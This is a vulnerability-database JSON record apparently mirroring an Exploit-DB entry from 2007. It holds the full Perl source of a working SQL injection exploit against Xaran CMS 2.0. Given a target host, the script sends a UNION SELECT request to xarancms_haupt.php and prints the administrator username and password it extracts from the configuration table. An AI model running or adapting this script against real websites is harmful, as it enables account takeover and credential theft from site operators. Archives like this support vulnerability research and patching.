{"id": "EDB-ID:3298", "hash": "eb9d9ec84d1ff207e2cdc2dd0507eeb6", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Xaran CMS <= 2.0 xarancms_haupt.php SQL Injection Exploit", "description": "Xaran Cms <= 2.0 (xarancms_haupt.php) SQL Injection Exploit. Webapps exploit for php platform", "published": "2007-02-13T00:00:00", "modified": "2007-02-13T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/3298/", "reporter": "ajann", "references": [], "cvelist": [], "lastseen": "2016-01-31T18:09:32", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2016-01-31T18:09:32"}, "dependencies": {"references": [], "modified": "2016-01-31T18:09:32"}, "vulnersScore": 0.2}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/3298/", "sourceData": "#!/usr/bin/perl\n#[Script Name: Xaran Cms <= V2.0 (xarancms_haupt.php) Remote SQL Injection Exploit\n#[Coded by : ajann\n#[Author : ajann\n#[Contact : :(\n#[S.Page : http://www.xarancms.de\n#[$$ : 149.00 EUR\n#[.. : ajann,Turkey\n\nuse IO::Socket;\nif(@ARGV < 1){\nprint \"\n[========================================================================\n[// \tXaran Cms <= V2.0 (xarancms_haupt.php) Remote SQL Injection Exploit\n[// Usage: exploit.pl [target]\n[// Example: exploit.pl victim.com\n[// Example: exploit.pl victim.com\n[// Vuln&Exp : ajann\n[========================================================================\n\";\nexit();\n}\n#Local variables\n$server = $ARGV[0];\n$server =~ s/(http:\\/\\/)//eg;\n$host = \"http://\".$server;\n$port = \"80\";\n$file = \"/xarancms_haupt.php?id=\";\n\nprint \"Script <DIR> : \";\n$dir = <STDIN>;\nchop ($dir);\n\nif ($dir =~ /exit/){\nprint \"-- Exploit Failed[You Are Exited] \\n\";\nexit();\n}\n\nif ($dir =~ /\\//){}\nelse {\nprint \"-- Exploit Failed[No DIR] \\n\";\nexit();\n }\n\n\n$target = \"-1%20union%20select%20concat(char(117,115,101,114,110,97,109,101,58),konfiguration_benutzername,char(32,112,97,115,115,119,111,114,100,58),konfiguration_benutzerkennwort)%20from%20xarancms_konfiguration\";\n$target = $host.$dir.$file.$target;\n\n#Writing data to socket\nprint \"+**********************************************************************+\\n\";\nprint \"+ Trying to connect: $server\\n\";\n$socket = IO::Socket::INET->new(Proto => \"tcp\", PeerAddr => \"$server\", PeerPort => \"$port\") || die \"\\n+ Connection failed...\\n\";\nprint $socket \"GET $target HTTP/1.1\\n\";\nprint $socket \"Host: $server\\n\";\nprint $socket \"Accept: */*\\n\";\nprint $socket \"Connection: close\\n\\n\";\nprint \"+ Connected!...\\n\";\n#Getting\nwhile($answer = <$socket>) {\nif ($answer =~ /letzte Aktualisierung: username:(.*?) pass/){\nprint \"+ Exploit succeed! Getting admin information.\\n\";\nprint \"+ ---------------- +\\n\";\nprint \"+ Username: $1\\n\";\n}\n\nif ($answer =~ /password:(.*?)<\\/div>/){\nprint \"+ Password: $1\\n\";\n}\n\nif ($answer =~ /Syntax error/) { \nprint \"+ Exploit Failed : ( \\n\";\nprint \"+**********************************************************************+\\n\";\nexit(); \n}\n\nif ($answer =~ /Internal Server Error/) {\nprint \"+ Exploit Failed : ( \\n\";\nprint \"+**********************************************************************+\\n\";\nexit(); \n}\n }\n\n# milw0rm.com [2007-02-13]\n", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{}